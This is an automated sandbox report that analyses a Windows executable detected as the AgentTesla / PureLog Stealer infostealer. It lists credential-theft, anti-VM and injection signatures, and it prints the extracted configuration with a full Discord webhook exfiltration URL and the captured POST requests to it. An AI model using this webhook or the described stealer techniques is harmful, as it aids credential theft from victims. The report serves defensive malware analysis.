Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T_240369_S#U0130PAR#U0130S.exe

Overview

General Information

Sample name:T_240369_S#U0130PAR#U0130S.exe
renamed because original name is a hash value
Original sample name:T_240369_SPARS.exe
Analysis ID:1417014
MD5:73f2aa0989d9fcb98763fbb461422f9f
SHA1:27b4d0302c43e95c19942eea9dea94d673e18578
SHA256:843fa4dd9e5d81d150e4d6cd251dc26dafc7409bb4516abebce70114c62548c6
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains potential unpacker
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1650117594.0000000005C10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 16 entries
              SourceRuleDescriptionAuthorStrings
              0.2.T_240369_S#U0130PAR#U0130S.exe.468f600.12.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.T_240369_S#U0130PAR#U0130S.exe.46675e0.13.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        Click to see the 31 entries
                        No Sigma rule has matched
                        Timestamp:03/28/24-13:58:56.493013
                        SID:2851779
                        Source Port:49730
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd"}
                        Source: T_240369_S#U0130PAR#U0130S.exeReversingLabs: Detection: 47%
                        Source: T_240369_S#U0130PAR#U0130S.exeJoe Sandbox ML: detected
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: T_240369_S#U0130PAR#U0130S.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then jmp 05B760DCh0_2_05B75FF0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then jmp 05B742D0h0_2_05B73F08
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then jmp 05B742D0h0_2_05B73EFA
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then jmp 05B74A46h0_2_05B749E0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then jmp 05B74A46h0_2_05B749D0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then jmp 05B760DCh0_2_05B76178
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then jmp 05B760DCh0_2_05B76000
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then jmp 05B760DCh0_2_05B76318
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05C0D440
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05D16D98
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05D16DA0

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49730 -> 162.159.137.232:443
                        Source: Yara matchFile source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340, type: MEMORYSTR
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: ip-api.com
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1Content-Type: multipart/form-data; boundary=----------bbf04aceaf2e4ca780dd290cb3f9ba1cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1168Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1Content-Type: multipart/form-data; boundary=----------9f8a08985d6743459b05911f9073b2abUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 429Expect: 100-continue
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: ip-api.com
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1Content-Type: multipart/form-data; boundary=----------bbf04aceaf2e4ca780dd290cb3f9ba1cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1168Expect: 100-continueConnection: Keep-Alive
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1220534378975854717/1222892686101708902/user-528110_2024-03-
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWub
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1220534378975854717/1222892686101708902/user-528110_2024-0
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49730 version: TLS 1.2

                        System Summary

                        barindex
                        Source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F651880_2_02F65188
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F6A1300_2_02F6A130
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F6B51C0_2_02F6B51C
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F683380_2_02F68338
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F683280_2_02F68328
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F6A0F00_2_02F6A0F0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F651820_2_02F65182
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F6C7C80_2_02F6C7C8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F6C7B80_2_02F6C7B8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F6E4890_2_02F6E489
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F65EC80_2_02F65EC8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_02F65E290_2_02F65E29
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05AD4D280_2_05AD4D28
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05AD12B00_2_05AD12B0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05AD12090_2_05AD1209
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05AD15E70_2_05AD15E7
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05AD28C80_2_05AD28C8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B464F00_2_05B464F0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B44C600_2_05B44C60
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B458030_2_05B45803
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B44C580_2_05B44C58
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B4502A0_2_05B4502A
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B400060_2_05B40006
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B400400_2_05B40040
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B4F2A80_2_05B4F2A8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B46AC10_2_05B46AC1
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B7D5400_2_05B7D540
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B716B00_2_05B716B0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B7D5E20_2_05B7D5E2
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B7D5300_2_05B7D530
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B757980_2_05B75798
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B757880_2_05B75788
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B761780_2_05B76178
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B7C2D00_2_05B7C2D0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05B7C2C00_2_05B7C2C0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05C0EBB80_2_05C0EBB8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05C000400_2_05C00040
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05C000340_2_05C00034
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05D177780_2_05D17778
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05D177680_2_05D17768
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05E7C9F80_2_05E7C9F8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05E600400_2_05E60040
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 0_2_05E600060_2_05E60006
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_0114EBC81_2_0114EBC8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_01144A601_2_01144A60
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_0114ACD01_2_0114ACD0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_01143E481_2_01143E48
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_011441901_2_01144190
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_011419B81_2_011419B8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_0666D5581_2_0666D558
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_0666BCDC1_2_0666BCDC
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_066766381_2_06676638
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_066755E81_2_066755E8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_0667B2801_2_0667B280
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_0667C1D81_2_0667C1D8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_06677DC81_2_06677DC8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_06672B301_2_06672B30
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_066776E81_2_066776E8
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_0667E3F01_2_0667E3F0
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_066700401_2_06670040
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_06675D381_2_06675D38
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_066700061_2_06670006
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePmfcahfwm.dll" vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs T_240369_S#U0130PAR#U0130S.exe
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs T_240369_S#U0130PAR#U0130S.exe
